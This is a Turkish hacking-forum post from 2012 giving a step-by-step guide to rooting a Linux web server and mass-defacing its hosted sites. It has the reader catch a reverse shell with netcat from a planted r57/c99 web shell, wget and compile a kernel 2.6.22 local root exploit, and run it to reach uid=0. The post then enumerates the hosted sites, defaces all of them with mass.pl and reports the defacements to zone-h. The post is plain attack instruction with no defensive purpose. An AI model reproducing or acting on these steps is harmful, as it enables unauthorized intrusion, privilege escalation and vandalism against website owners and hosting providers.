| Henüz Üye Degilmisin ? Üye Ol | Parolamı Unuttum |
|
17 Ocak 2012, 18:28
| #1 |
 |  Linux Server Root (Full Anlatım Resimli) Linux Server Root (Full Anlatım Resimli) Merhaba Arkadaşlar malzemeler: 1) netcat (for back connect) 2) r57 yada c99 shell (Back connect opsinoyu bazı c99larda da mevcuttur) 3)mass.pl (çoklu deface için indexleyicidir) 4)zone-h.pl (çoklu deface kaydı içindir) 5) special bir index Başlayalım başlat çalıştıra cmd yazıp tamam diyoruz karşımıza siyah ms-dos ekranı gelecek bu ekrana nc -v -l -p 443 yazalım (ben 443 dedim sizde hangi port açıksa artık) enterlıyalım Ufak bi not: (bazen sizin portunuz açık olabilir ama serverin o portu açık olmayabilir açık server portunu Nmap - Zenmap GUI programı bize soyluyor. bununla tarayabilirniz) evet ornek olarak r57 shellimizde de back connect yerine 443 yazıyoruz    shellimizde de bu yazı çıktıktan sonra dos ekranına donelim baglandıkmı bakalım  evet baglandık serverimiz 2007 sürümü 2.6.22 exploitimizi googledan veya milw0rm türü sitelerden dan arayıp bulduktan sonra serverin yazma silme izni olan bi klasorune atıyoruz genelde tmp ye atılır tmp dizinleri iki kısımdır birisi dizin olarak /tmp dizinindedir diğeri ise /home1/corppmco/public_html/tmp dizinindedir ikinci verdiğim joomla sitelerdedir. wget komutuyla exploiti server upload edelim ornek olarak wget [Yanlizca 10 Saniyede Üye Olmak Için TIKLAYINIZ...] exploitlerin uzantısı c dir c diliyle yazıldıklarından dolayı not: bazı serverlar wget komutunu kabul etmez shellden manuel upload da uygun bir yoldur. attıgımız exploiti derleyecegiz şimdi ( derleme işleminde yeni isim verecegiz) gcc -o root 2.6.22.c (root yazdımız yere istediginizi yazabilirsiniz) chmod ayarı yapacagız chmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra ./root diyerek exploitimizi çağırıyoruz (alttaki resimde oldugu gibi)  bazen hemen bazen bi süre bekledikten sonra cevap gelir sabırlı olun id komutuyla kontrol edelim  evet serverimiz rootlandı whoami komutuylada bu görüyoruz (verdiğimiz isim çıkmalıdır) uid=0 ı gorduk şimdi musait bi yere indeximizi ve mass.pl yi atalım serverdakileri siteleri gormek içinse çok çeşitli yollarımız mevcuttur bu komutlar : /etc/vdomainaliases/ /etc/vfilters/ /var/www/vhosts/ /var/named/ /etc/passwd/ /etc/hosts/ /etc/apache/ /etc/apache2/ /etc/named.conf/ gibi bizimki /var/www/vhosts/ cd /var/www/hosts/ komutunu verdikten sonra ls (LS yani) komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz  siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hack.txt diyer kayıt edin.(bilgilsayarınızda perl Programı yuklu olmalıdır) kayıt ettikten sonra dos ekranında mass deface işlemine gecelim  önce ekrana perl mas.pl yazıp nasıl çalıştıgınız kontrol ediyoruz daha sonra uygulamaya geciyoruz (orda example ı veriyor) mass deface biraz zaman alabilir sabırlı olmak gerek işlem bitince all homepages defaced diye bi yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz cd.. cd.. cd perl cd bin perl zoneh.pl hack.txt Kam_06 (nickimi yazdım) yazıp enter diyoruz  |
|  |
| Sponsor Linkler (Lütfen Sitemize Destek Olmak İçin Günde Bir Kez Tıklayınız) | |
| | |
 |
| Paylaş |
| Etiketler |
| anlatim, full, full anlatım resimli, linux, linux server root, resimli, root, server |
| Seçenekler | |
| Stil | |
| |
Benzer Konular | ||||
| Konu | Konuyu Açan | Forum | Cevap | Son Mesaj |
| C99 Shell Kullanımı (Resimli Anlatım) | Ceybi | Web Güvenlik Açıkları | 0 | 01 Şubat 2012 17:33 |
| Joomla Kurulumu(Resimli Anlatım) | Ceybi | Joomla | 0 | 15 Ocak 2012 16:24 |
| phpBB Kurulumu(Resimli Anlatım) | Ceybi | phpBB | 0 | 15 Ocak 2012 16:22 |
| vBulletin Kurulumu Resimli Anlatım | Ceybi | vBulletin | 0 | 15 Ocak 2012 15:59 |
| Exploit Kullanımı Resimli Anlatım | Ceybi | Exploitler ve Güvenlik Açıkları | 0 | 15 Ocak 2012 13:10 |
Normal
